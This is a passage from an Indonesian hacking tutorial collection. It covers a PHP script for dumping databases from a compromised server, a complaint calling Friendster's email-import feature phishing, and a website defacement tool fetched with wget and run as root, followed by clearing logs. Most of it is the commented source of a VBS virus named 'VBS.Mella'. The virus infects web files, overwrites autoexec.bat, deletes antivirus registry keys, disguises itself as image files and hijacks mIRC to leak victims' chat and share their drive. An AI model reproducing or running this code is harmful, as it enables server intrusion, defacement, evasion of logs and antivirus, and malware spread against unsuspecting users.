} ?> </table><br><b>DATA<b><br> <table bordercolor=blue border=1> <? $fields = mysql_list_fields("$db", "$tb", $con); $columns = mysql_num_fields($fields); echo "<tr><th>"; for ($i = 0; $i < $columns; $i++) { echo mysql_field_name($fields, $i) . "<th>";; } echo "</tr>" ?> <tr> <?php $perintah="select * from $tb"; $tampil_data=mysql_query($perintah); while($data=mysql_fetch_row($tampil_data)) {echo("<tr><td>$data[0]<td>$data[1]<td>$data[2]<td>$data[3]<td>$data[4]<td>$d ata[5]<td>$data[6]<td>$data[7]<td>$data[8]<td>$data[9]<td>$data[10]<td>$data[1 1]<td>$data[12]<td>$data[13]<td>$data[14]<td>$data[15]<td>$data[16]<td>$data[ 17]<td>$data[18]<td>$data[19]<td>$data[20]<td>$data[21]<td>$data[22]<td>$data [23]<td>$data[24]<td>$data[25]<td>$data[26]<td>$data[27]<td>$data[28]<td>$dat a[29]<td>$data[30]<td>$data[31]<td>$data[32]<td>$data[33]<td>$data[34]<td>$da ta[35]</tr>"); } ?> -----------------------------------------potong di sini-----------------------------------------

Lalu darimana mendapatkan mendapatkan nama user, password dan nama databasenya ???? Hehehe, ini memang perlu sedikit ketelitian dan kesabaran. Sebagai contoh kita bisa melihat isi file config.php milik PHPBB :

$dbhost = 'localhost'; $dbname = 'phpbb'; $dbuser = ''; $dbpasswd = '';

Selanjutnya tinggal meng-edit file diatas dengan data yang didapat dari config.php tadi, simpan di hosting gratisan kamu and then wget dari server yang berhasil disusupi. Jangan lupa untuk menambahkan option tb=nama_tabel pada saat mengaksesnya

22. Phising Friendster Phising artinya hampir sama dengan fishing(memancing), dimana dalam hal ini tidak memancing ikan, tetapi memancing informasi personal, yaitu dengan cara mengirimkan email dengan memalsukan alamat pengirim, contohnya dengan menggunakan perusahaan eBay, PayPal dan dalam kasus ini Friendster tentunya. Email tersebut akan meminta anda untuk mengirimkan informasi personal seperti frist name, last name, alamat, nomor credit card dll. Jadi singkat kata dalam bahasa Indonesia adalah "email penipu" atau dalam kasus di artikel ini adalah penipu yang meminta informasi anda. Hal : phising yg dilakukan oleh www.friendster.com (FS*) terhadap user terdaftar tanggal rilis : 16/7/2005 author : RhezTiw [rheztiw@yahoo.com] metode : phising tingkat bahaya : tinggi Ketika kita menyetujui Term of Service (ToS*) mereka saat pertama sign up maka kita dianggap sudah menyetujuinya dan telah membaca Privacy Policy (Privacy*) mereka. ada yg aneh dalam privacy mereka yaitu pada point Use of Information Obtained by Friendster, terutama pada sub Information that users do not submit to us. isinya adalah We use your server, IP address, and browser-type related information in the general administration of our website. Apakah cuma sampai di sini saja 'aksi' mereka? aku tidak tahu. karena aku tak cukup pintar untuk menyelidiki 'aksi' mereka terhadap sistem yg terkoneksi saat kita log in.

Phising coba klik fasilitas mereka pada link invite (http://www.friendster.com/invite.php?statpos=headernav). ternyata ada fasilitas Import Email Addresses. hmmm.. menarik bukan? fasilitas ini memudahkan user dalam memanagej accountnya di FS bagi mereka yg kebetulan menggunakan Yahoo!mail ato Hotmail sebagai username. INI ADALAH TRIK DASAR PHISING. fasilitas yg menarik dan bagus. yaitu daftar alamat email yg tersimpan dalam account email kita di yahoo!mail ato hotmail dapat dipindahkan ke dalam account FS kita dengan melakukan import. coba kita klik, ternyata kita diharuskan mengisi username dan password email kita. FS sudah tahu username dan password email kita. apa yg dapat mereka lakukan? Import addresses from your Yahoo! address book. Fill in your username and password and click "Import" to view your list of contacts. Friendster will not store your Yahoo password. (itu kata mereka) percayakah kita? who's know in cyberworld, gitu loh? so, semakin tinggi kepentingan kita menggunakan email.. maka semakin rawan informasi yg ada di dalamnya. (bisa aja berisi email tentang autentifikasi kartu kredit, rekening bank, polis asuransi, nomor jaminan, register paypal, dsb).

Saran 1. jangan menggunakan beberapa fasilitas di FS yg dapat membuat FS mendapat akses terhadap account email kita. 2. hindari pemakaian password yg sama di beberapa account yg berbeda, termasuk account FS. 3. gunakan email khusus untuk register di FS. kalo masih pake email primary kita, segera bikin email baru, lalu ganti email di FS dengan email baru tersebut.

Publikasi aku sudah mempublikasikan kegiatan phising ini dalam bulletin board (fasilitas FS) untuk memperingatkan temen2ku. dan dalam hitungan jam, accountku dihapus. semua posting bulletinku dihapus. emailku diblok. hebat sekali mereka. padahal aku menggunakan bahasa indonesia.

URL http://www.friendster.com/emailimport/yahoo/yimport.php http://www.friendster.com/emailimport/hotmail/hotimport.php

23. Deface Di sini saya memberikan Sebuah Program Yang dapat berjalan Sendiri Mencari targetNya Sewaktu Saya Berada Di sebuah Server Saya Melihat banyak sekali www/root yang berada Di sana sampai 100 www/root di sana , Kalau Saya copy paste ke semua www/root tersebut pasti deh banyak Memakan Waktu, Biaya ( Biaya Internet Donk ) dan Tenaga. Setelah saya berfikir, Kenapa harus Copy dan paste Secara manual , Buat saja Program yang Dapat mengerjakan Hal tersebut, Kita Hanya Nunggu Sambilan Minum kopi atau susu coklat :D Akhrinya Saya membuat tools ini, ada pun cara kerja tools saya ini adalah mencari "SASArAN" file index.html, index.php , main.php, Saja Di sini saya akan memberikan cara Pemakaiannya : 1. Sediakan cemilannya SilVer Queen dan Untuk minumnya Kopi atau Susu coklat ( cuma Saya Sarani ajah ) 2. Buka Shell anda Dan Login sebagai root ( tools ini hanya dapat di jalankan oleh root, karena root mempunyai akses unlimited kesemua Tempat ) 3. wget http://geocities.com/medan_hack1/tools/deface.tar.gz 4. tar -zxvf deface.tar.gz 5. Anda harus menyediakan file index.html ( yang harus berada tempatNya bersamaan dengan file deface, Dan file index.html berisi PEsan Deface kamu :P ) 6. Gunakan ./deface tunggu beberapa saat ( Anda Dapat Minum Kopi atau Susu Coklat ) 7. Setelah Selesai hapus Semua Log anda Agar Tidak ketahuan :P Semua Directory Yang mempunyai file index.html, index.php , main.php tadi akan di ganti file index.html Kamu. So Happy deface deh untuk melihat contoh deface Lihat di http://bahrain-uk.com/jos.html

24. Contoh Pembuatan Virus Yang Dibuat Dengan VBS. Intro: Terima kasih saya ucapkan pada Jasakom atas dimuatnya artikel ini. Artikel ini ditujukan bagi para pemula dalam menulis virus dalam VBS. Sebenarnya virus ini saya beri nama VBS.Mella tapi AntiVirus² membalikkan namanya (:Þ). VBS.Allem adalah virus VBS saya yang pertama, jadi masih banyak bug-bug disana-sini. Saya mulai belajar VBS dari source code² yang saya dapat dari berbagai situs terutama indovirus.net dan vx.netlux.org. Disclaimer: Saya tak bertanggung jawab atas kerugian atau kerusakan yang diakibatkan oleh artikel/source code ini. Artikel ini semata-mata hanya untuk pembelajaran. Anda bebas memakai, mengembangkan dan menggunakan source code ini selama menyertakan copyleftnya. Untuk saran, komentar dan informasi silahkan kirim ke : em@ilku.net Infection: -menginfeksi file² htm,html,htt,asp dan php -mengkloning file² wav,midi,mpg,mpeg,jpg dan bmp -meng 'overwrite' file² doc,xls,ppt,mdb,rtf dan txt -win.ini dan system.ini -autoexec.bat dan winstart.bat -regedit Features: -Mengubah ekstensi AntiVirus menjadi *.Mella -Keamanan berlapis(regedit,win.ini,system.ini,autoexec.bat,winstart.bat,shortcut,menu) -Enkripsi Payload: -jika tanggal sekarang=13 bulan sekarang=3 -menampilkan pesan -mendisable regedit,display control panel,shutdown,dos,drive,desktop dll Greetz: [K]alamar -thank's for ur tut crayolarx -ur vir inspire me kefi -ur html/vbs vir is ok alcopaul -nice virus man sevenC -kemana aja loe, masa sampe sini aja... iwing -kok situsnya sering suspended mas.. d-e-n-i,adhe,kesepian,joehunt,rinal -my best friend's on the real life n on the net ;-) phatygeni,khepri` -alo senior... bapadian se adiak² ma.. mayat,obor-jp -dree bilo ka payokumbuah? pakreno maa mp3 player wak ob|wan -da.. ;) vuem -gimana kabarnya bro? jejeng -pak guru.. hehehehe.. adriyanto,wira -mokasi komputernyo '--------------------------------------[Source Code Start]------------------------------- 'mendeklarasikan variabel(secara implisit), disinilah bagusnya VBS karena hanya ada satu

'tipe data yaitu Variant, yang menampung segala informasi bahkan objek. Dim Mella,Mela,Wella,Andalusia,DirektoriWindows,DirektoriSystem,DirektoriTemp,KodeVbs,KodeHtm,Chat,Drives,Drive,Folder,Files,File,Subfolders,Subfolder 'harus ada kalau tidak virus kamu akan berhenti bila terjadi error On Error Resume Next 'deklarasi global 'membuat objek file system dengan nama Mella Set Mella = CreateObject("Scripting.FileSystemObject") 'membuat ojek shell dengan nama Wella Set Wella = CreateObject("WScript.Shell") 'menset supaya vbs kita jalan tanpa timeout Wella.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0, "REG_DWORD" Wella.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0, "REG_DWORD" 'buka diri sendiri simpan di var Andalusia Set Andalusia = Mella.OpenTextFile(WScript.ScriptFullName,1) 'set folder C:\Windows untuk Win9x, C:\WinNT untuk WinNT tergantung jenis Windows Set DirektoriWindows = Mella.GetSpecialFolder(0) 'set folder system windows Set DirektoriSystem = Mella.GetSpecialFolder(1) 'set folder temp Set DirektoriTemp = Mella.GetSpecialFolder(2) 'baca andalusia simpan di var KodeVbs KodeVbs = Andalusia.ReadAll 'tag html untuk menyisipkan vbs kita sebagai script embeded KodeHtm = "<" & "html><" & "head><" & "title></" & "title></" & "head><" & "body><" & "script langua" & "ge=vbscr" & "ipt>" & vbCrLf & "on error resume next" & vbCrLf & "set mella=createobject(""scripting.filesystemobject"")" & vbCrLf & "if err.number=429 then" & vbCrLf & "document.write " & Chr(34) & "<center><fo" & "nt face='verdana' size='2' color='#FF0000'>You need ActiveX enabled to view this file!<br>Click <" & "a hre" & "f='javascript:location.reload()'>Here</a> to reload and click <b>*YES*</b></font></center>" & Chr(34) & "" & vbCrLf & "else" & vbCrLf & KodeVbs & vbCrLf KodeHtm = KodeHtm & "document.write " & Chr(34) & "<" & "font face='verdana' size='2' color='#FF000" & "0'>This is [Mella Andalusia's] document...!, <br>You don't have permission to access this document...</" & "font>" & Chr(34) & "" & vbCrLf & "end if" & vbCrLf & "</" & "script></" & "body></" & "html>" 'panggil fungsi Svck_AntiVirus() Svck_AntiVirus() 'panggil sub Fvck_AntiVirus() Fvck_AntiVirus() 'panggil sub Start()

Start() 'panggil sub Fvck_Reg() Fvck_Reg() 'panggil sub Tukar_Icon() Tukar_Icon() 'panggil sub Shorcut() Shorcut() 'panggil sub CheckDrive() CheckDrive() 'sub untuk mengakses,membuka dan mengedit win.ini dan system.ini 'pemanggilan sub dengan EditIni(nama_file,seksi,string,string baru/tambahan) Sub EditIni(FileName,Section,String,NewValue) On Error Resume Next 'konstanta Const ForReading = 1 Const ForWriting = 2 iniFile = filename sectionName = section keyName = string newVlaue = newvalue bInSection = false bKeyChanged = false Set fso = CreateObject("Scripting.FileSystemObject") Set ts = fso.OpenTextFile(iniFile, ForReading) lines = Split(ts.ReadAll,vbCrLf) ts.close For n = 0 to ubound(lines) if left(lines(n),1) = "[" then if bInSection then exit for end if if instr(lines(n),sectionName) = 1 then bInSection = true else bInSection = false end if else if bInSection then if instr(lines(n),keyName & "=") = 1 then bKeyChanged = true lines(n) = keyName & "=" & newVlaue bKeyChanged = true exit for end if end if end if Next if bKeyChanged then Set ts = fso.OpenTextFile(iniFile, ForWriting) ts.Write join(lines,vbCrLf) ts.close end if set ts = nothing set fso = nothing end sub 'sub menghapus key AntiVirus di registry[bug](ada yang punya cara lain) Sub Fvck_AntiVirus() 'memakai objek shell yg kita buat untuk mengakses registry Wella.RegDelete "HKLM\Software\Symantec\"

Wella.RegDelete "HKLM\Software\McAfee\" Wella.RegDelete "HKLM\Software\TrendMicro\" Wella.RegDelete "HKLM\Software\KasperskyLab\" Wella.RegDelete "HKLM\Software\H+BEDV\" Wella.RegDelete "HKLM\Software\Panda Software\" Wella.RegDelete "HKLM\Software\Computer Associates\" Wella.RegDelete "HKLM\Software\FRISK Software International\" Wella.RegDelete "HKLM\Software\GriSoft\" Wella.RegDelete "HKLM\Software\Sophos\" End Sub 'sub meng 'overwrite' autoexec.bat dan winstart.bat Sub Svck_AntiVirus() 'buat file autoexec.bat, kalau telah ada overwrite! Set Mela = Mella.CreateTextFile("C:\Autoexec.bat",True) 'tulis isi autoexec.bat 'bila dijalankan akan merename *.* menjadi *.Mella sehingga AntiVirus Error Mela.WriteLine "@echo off" Mela.WriteLine "ren C:\Progra~1\Symant~1\*.* *.Mella" Mela.WriteLine "ren C:\Progra~1\Norton~1\*.* *.Mella" Mela.WriteLine "ren C:\Progra~1\TrendP~1\*.* *.Mella" Mela.WriteLine "ren C:\Progra~1\AVPers~1\*.* *.Mella" Mela.WriteLine "ren C:\Progra~1\AVP\*.* *.Mella" Mela.WriteLine "ren C:\Progra~1\FSI\F-Prot~1\*.* *.Mella" Mela.WriteLine "ren C:\Progra~1\Antivi~1\*.* *.Mella" Mela.WriteLine "ren C:\Progra~1\Comput~1\eTrust~1\eTrust~1\*.* *.Mella" Mela.WriteLine "ren C:\Progra~1\PandaS~1\*.* *.Mella" Mela.WriteLine " " 'mengkopi diri sendiri ke C:\mella.bat Mela.WriteLine "copy %0 c:\mella.bat" 'ubah atribut file jadi hidden dan read only Mela.WriteLine "attrib c:\mella.bat +h +r" Mela.WriteLine "echo" 'tutup file autoexec.bat Mela.Close 'buat file winstart.bat Set Mela = Mella.CreateTextFile("C:\WINSTART.BAT",True) 'bila dijalankan akan mengaktifkan explorer.vbs Mela.WriteLine "@Start "&DirektoriWindows&"\explore.vbs" 'tutup file Mela.Close 'akhir sub End Sub 'sub membuat backup virus Sub Start() 'deklarasi var Dim BackUpVirus 'salin diri sendiri dan simpan di var BackUpVirus Set BackUpVirus = Mella.GetFile(WScript.ScriptFullName) 'kopi file di C:\%windir%\explorer.vbs BackUpVirus.Copy(DirektoriWindows&"\explore.vbs") 'kopi file di C:\%Sysdir%\mtask.vbe BackUpVirus.Copy(DirektoriSystem&"\mtask.vbe") 'kopi file di C:\%Temp%\kernel32.dll BackUpVirus.Copy(DirektoriTemp&"\kernel32.dll") 'kopi file di C:\Siti-Nurhaliza.jpg.vbs BackUpVirus.Copy("C:\Siti-Nurhaliza.jpg.vbs") 'kopi file di C:\Mella-Andalusia.gif.vbe BackUpVirus.Copy("C:\Mella-Andalusia.gif.vbe") 'ubah atribut file jadi hidden

BackUpVirus.Attributes = 2 'tutup file BackUpVirus.Close 'akhir sub End Sub 'sub menulis regedit Sub Fvck_Reg() Wella.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\" 'pesan ketika komputer hidup Wella.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","Microsucks Widows" Wella.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","Hai Mella Andalusia..." 'menyisipkan menu di menu klik kanan di direktori Wella.RegWrite "HKEY_CLASSES_ROOT\Directory\Shell\maVero\","ma&Vero" 'file tujuan menu Wella.RegWrite "HKEY_CLASSES_ROOT\Directory\Shell\maVero\Command\",DirektoriWindows&"\explore.vbs" 'menyisipkan menu di menu klik kanan di drive Wella.RegWrite "HKEY_CLASSES_ROOT\Drive\Shell\Mella\","Me&lla" 'file tujuan menu ketika diklik Wella.RegWrite "HKEY_CLASSES_ROOT\Drive\Shell\Mella\Command\",DirektoriSystem&"\mtask.vbe" 'menyisipkan menu di menu klik kanan di folder Wella.RegWrite "HKEY_CLASSES_ROOT\Folder\Shell\Mella\","Me&lla" 'file tujuan menu Wella.RegWrite "HKEY_CLASSES_ROOT\Folder\Shell\Mella\Command\",DirektoriWindows&"\explore.vbs" 'menset option internet explorer Wella.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Page_URL","C:\Mella.htm" Wella.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Search_URL","C:\Mella.htm" Wella.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Local Page","C:\Mella.htm" Wella.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Search Page","C:\Mella.htm" Wella.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page","C:\Mella.htm" Wella.RegWrite "HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\@","Mella Lives Here" Wella.RegWrite "HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InfoTip","I'm Mella-Andalusia tray" Wella.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","C:\Mella.htm" Wella.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Page","C:\Mella.htm" Wella.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Window Title", "", "REG_SZ" Wella.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Window Title", "Mella Andalusia", "REG_SZ" Wella.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "", "REG_SZ" Wella.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet

Explorer\Main\Window Title", "Mella Andalusia", "REG_SZ" Wella.RegWrite "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\VNETSUP\Workgroup","Mella_Andalusia" Wella.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EmailName","m@Vero.Tv" Wella.RegWrite "HKEY_CURRENT_USER\Software\Netscape\Netscape Navigator\Main\Autoload Home Page","yes" Wella.RegWrite "HKEY_CURRENT_USER\Software\Netscape\Netscape Navigator\Main\Home Page","C:\Mella.htm" Wella.RegWrite "HKEY_CURRENT_USER\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Login\Screen Name","Mella_Andalusia" Wella.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info\DefCompany","Mella-soft" Wella.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info\DefName","Mella Andalusia, I never know what is in your heart." Wella.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner","Mella Andalusia" Wella.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization",":: maVeroSoft ::" Wella.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Telephony\Country List\1\Name","Payakumbuh Goes to World" Wella.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\URL\DeatfulPrefix\(predeterminado)", "Mella:\\" Wella.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\URL\Prefixes\www", "Mella:\\" Wella.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\URL\Prefixes\home", "Mella:\\" Wella.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\URL\Prefixes\ftp", "SEND_ME! (MeLLa-ViRuS)" Wella.RegWrite "HKEY_CURRENT_USER\Control Panel\Desktop\Wallpaper","C:\Mella.htm" Wella.RegWrite "HKEY_CURRENT_USER\Control Panel\International\s1159","Mella" Wella.RegWrite "HKEY_CURRENT_USER\Control Panel\International\s2359","Wella" Wella.RegWrite "HKEY_CURRENT_USER\Control Panel\International\sTimeFormat","HH:mm:ss tt" Wella.RegWrite "HKEY_CURRENT_USER\Software\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\","Mella Computer" Wella.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OrgOrganization",":: maVeroSoft ::" Wella.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OrgOwner","Mella Andalusia" Wella.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",1,"REG_DWORD" Wella.RegWrite

"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt",1,"REG_DWORD" Wella.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView",1,"REG_DWORD" Wella.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebViewBarricade",1,"REG_DWORD" DefaultId = Wella.RegRead("HKEY_CURRENT_USER\Identities\Default User ID") OutLookVersion = Wella.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer") Wella.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD" Wella.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD" Wella.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD" End Sub 'sub untuk mengubah icon file Sub Tukar_Icon() Wella.RegWrite "HKEY_CLASSES_ROOT\.VBS\","VBSFile" Wella.RegWrite "HKEY_CLASSES_ROOT\.VBE\","VBEFile" 'menyalin icon default file jpeg ke file vbs Wella.RegWrite "HKEY_CLASSES_ROOT\VBSFile\DefaultIcon\", Wella.RegRead("HKEY_CLASSES_ROOT\jpegfile\DefaultIcon\") 'menyalin icon default file gif ke file vbe Wella.RegWrite "HKEY_CLASSES_ROOT\VBEFile\DefaultIcon\", Wella.RegRead("HKEY_CLASSES_ROOT\giffile\DefaultIcon\") Wella.RegWrite "HKEY_CLASSES_ROOT\.dll\","dllfile" Wella.RegWrite "HKEY_CLASSES_ROOT\.dll\Content Type","application/x-msdownload" Wella.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",Wella.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\") 'mengubah program untuk menjalankan file dll Wella.RegWrite "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\","VBScript" 'letak wscript Wella.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",DirSys32 & "WScript.exe ""%1"" %*" Wella.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}" Wella.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}" End Sub 'sub membuat shortcut² yang bertujuan ke file² backup virus Sub Shorcut() 'deklarasi var Dim MyShortcut, MyDesktop, DesktopPath, DesktopPath2, DesktopPath3, DesktopPath4, DesktopPath5, DesktopPath6 'menset letak shortcut DesktopPath = Wella.SpecialFolders("Desktop") DesktopPath2 = Wella.SpecialFolders("StartUp") DesktopPath3 = Wella.SpecialFolders("SendTo")

DesktopPath4 = Wella.SpecialFolders("Favorites") DesktopPath5 = Wella.SpecialFolders("Recent") DesktopPath6 = Wella.SpecialFolders("StartMenu") 'membuat nama² shortcut Set MyShortcut = Wella.CreateShortcut(DesktopPath & "\Marshanda.lnk") Set MyShortcut2 = Wella.CreateShortcut(DesktopPath2 & "\Agnes-Monica.lnk") Set MyShortcut3 = Wella.CreateShortcut(DesktopPath3 & "\Dian-Sastro.lnk") Set MyShortcut4 = Wella.CreateShortcut(DesktopPath4 & "\Titi-Kamal.lnk") Set MyShortcut5 = Wella.CreateShortcut(DesktopPath5 & "\SpiderMan-3.lnk") Set MyShortcut6 = Wella.CreateShortcut(DesktopPath6 & "\Siti-Nurhaliza.lnk") 'membuat tujuan² shortcut MyShortcut.TargetPath = WSHShell.ExpandEnvironmentStrings(DirektoriWindows&"\explore.vbs") MyShortcut.Save MyShortcut2.TargetPath = WSHShell.ExpandEnvironmentStrings(DirektoriSystem&"\mtask.vbe") MyShortcut2.Save MyShortcut3.TargetPath = WSHShell.ExpandEnvironmentStrings(DirektoriTemp&"\kernel32.dll") MyShortcut3.Save MyShortcut4.TargetPath = WSHShell.ExpandEnvironmentStrings(DirektoriTemp&"\kernel32.dll") MyShortcut4.Save MyShortcut5.TargetPath = WSHShell.ExpandEnvironmentStrings("C:\Mella-Andalusia.gif.vbe") MyShortcut5.Save MyShortcut6.TargetPath = WSHShell.ExpandEnvironmentStrings("C:\Siti-Nurhaliza.jpg.vbs") MyShortcut6.Save End Sub 'fungsi menginfeksi mIRC Function Mella_mIRC(Path) 'buat file script.ini di path mirc ditemukan set Chat=Mella.CreateTextFile(Path & "\script.ini") Chat.WriteLine "[script]" 'ketika start mIRC remote on Chat.WriteLine "n0=ON 1:START:{" Chat.WriteLine "n1=.remote on" Chat.WriteLine "n2=}" 'ketika mIRC connect buat direktori Chat.WriteLine "n3=ON 1:CONNECT:{" Chat.WriteLine "n4=.mkdir c:\Mella_Andalusia" Chat.WriteLine "n5=.mkdir c:\Mella_Andalusia\Live_In" Chat.WriteLine "n6=.mkdir c:\Mella_Andalusia\Live_In\Your_PC" Chat.WriteLine "n7=.mkdir c:\Mella_Andalusia\Live_In\Your_PC\Made_by" Chat.WriteLine "n8=.mkdir c:\Mella_Andalusia\Live_In\Your_PC\Made_by\maVero" 'set email Chat.WriteLine "n9=.emailaddr Mella@mella.com" 'set fullname Chat.WriteLine "n10=.fullname :: Mella Andalusia ::" 'autojoin channel Chat.WriteLine "n11=.join #bandung,#Bali,#surabaya,#unp" Chat.WriteLine "n12=.join #padang,#medan,#jakarta,#malang" Chat.WriteLine "n13=.join #bawel,#indonesia,#payakumbuh,#denpasar"

Chat.WriteLine "n14=}" 'bila ada yg join kirim message Chat.WriteLine "n15=ON 1:JOIN:#:if ($nick != $me) .msg $nick hi" 'bila ada yg part kirim message Chat.WriteLine "n16=ON 1:PART:#:if ($nick != $me) .msg $nick hai" 'bila di invite kirim message Chat.WriteLine "n17=ON 1:INVITE:*: .msg $nick mohon jangan di invite join channel #unp aja.." 'bila di notice kirim notice Chat.WriteLine "n18=ON 1:NOTICE:*: .notice $nick notice2 baa ko" 'bila ada text ö di channel sharing drive c: Chat.WriteLine "n19=ON 1:TEXT:*ö*:#:.fserve $nick 1 c:\" 'bila ada text ping di channel, notice ping Chat.WriteLine "n20=ON 1:TEXT:*ping*:#:.notice $nick PING Time for $nick is : $duration($calc($ctime - $2)) $+ ." 'artikan sendiri selanjutnya.. be creative bro Chat.WriteLine "n21=ON 1:TEXT:*por*:*:.ignore $nick" Chat.WriteLine "n22=ON 1:TEXT:*lag*:#:.notice $nick itulah jan pakai TelkomNet Instan juo..." Chat.WriteLine "n23=ON 1:TEXT:*bye*:#:.notice $nick bye juga $nick ..." Chat.WriteLine "n24=ON 1:TEXT:*gtg*:#:.notice $nick eh $nick jangan pergi dulu..." Chat.WriteLine "n25=ON 1:TEXT:*Hilman*:#:.notice anton Nick = $nick . IP = $ip . Server = $server $+ : $+ $port $+ . URL = $url ." Chat.WriteLine "n26=ON 1:TEXT:*a*:?:{" Chat.WriteLine "n27=.msg $nick ngomong di #unp aja yuk.." Chat.WriteLine "n28=}" Chat.WriteLine "n29=;fkghkfgdkfgkdfi7k5f7g6k7kd86khkgk" Chat.WriteLine "n30=ON 1:TEXT:*i*:?:{" Chat.WriteLine "n31=.msg $nick $me tunggu di #unp" Chat.WriteLine "n32=}" Chat.WriteLine "n33=;dfk67k76hk67d76k6hk6cvhk6v7b7v6ckv76bvc6gh6hk" Chat.WriteLine "n34=ON 1:TEXT:*u*:?:{" Chat.WriteLine "n35=.msg $nick join dulu #unp baru $me jawab.. ok" Chat.WriteLine "n36=}" Chat.WriteLine "n37=;xg67 kn7gh7xj76df7gjf7g6f7" Chat.WriteLine "n38=ON 1:TEXT:*e*:?:{" Chat.WriteLine "n39=.msg $nick inul nunggu kamu tuh di #unp" Chat.WriteLine "n40=}" Chat.WriteLine "n41=;xd7fk8dfgk6cg876kg76gt6jtg7f6ji7fgj" Chat.WriteLine "n42=ON 1:TEXT:*o*:?:{" Chat.WriteLine "n43=.msg $nick ada yang nanyain kamu di #unp" Chat.WriteLine "n44=}" Chat.WriteLine "n45=;xfg7j78fd7j7idjt7fj76g95x" Chat.WriteLine "n46=ON 1:TEXT:*x*:?:.ignore $nick" Chat.WriteLine "n47=ON 1:TEXT:*www*:?:.ignore $nick" Chat.WriteLine "n48=ON 1:TEXT:*http*:?:.ignore $nick" 'mempaste di channel #unp perkataan chat korban Chat.WriteLine "n49=ON 1:INPUT:*:{" Chat.WriteLine "n50=.msg #unp ( $+ $active $+ ) $1-" Chat.WriteLine "n51=set %maVero status window" Chat.WriteLine "n52=if ( $active == %maVero ) { $1- | halt }" Chat.WriteLine "n53=}" 'pesan keluar mIRC Chat.WriteLine "n54=ON 1:QUIT:.ame mau liat situs www.marshanda.org www.agnes-monica.info www.dian-sastro.net www.titi-kamal.com dan www.siti-nurhaliza.info dulu! bye.." Chat.Close end function 'sub mencari file di harddisk

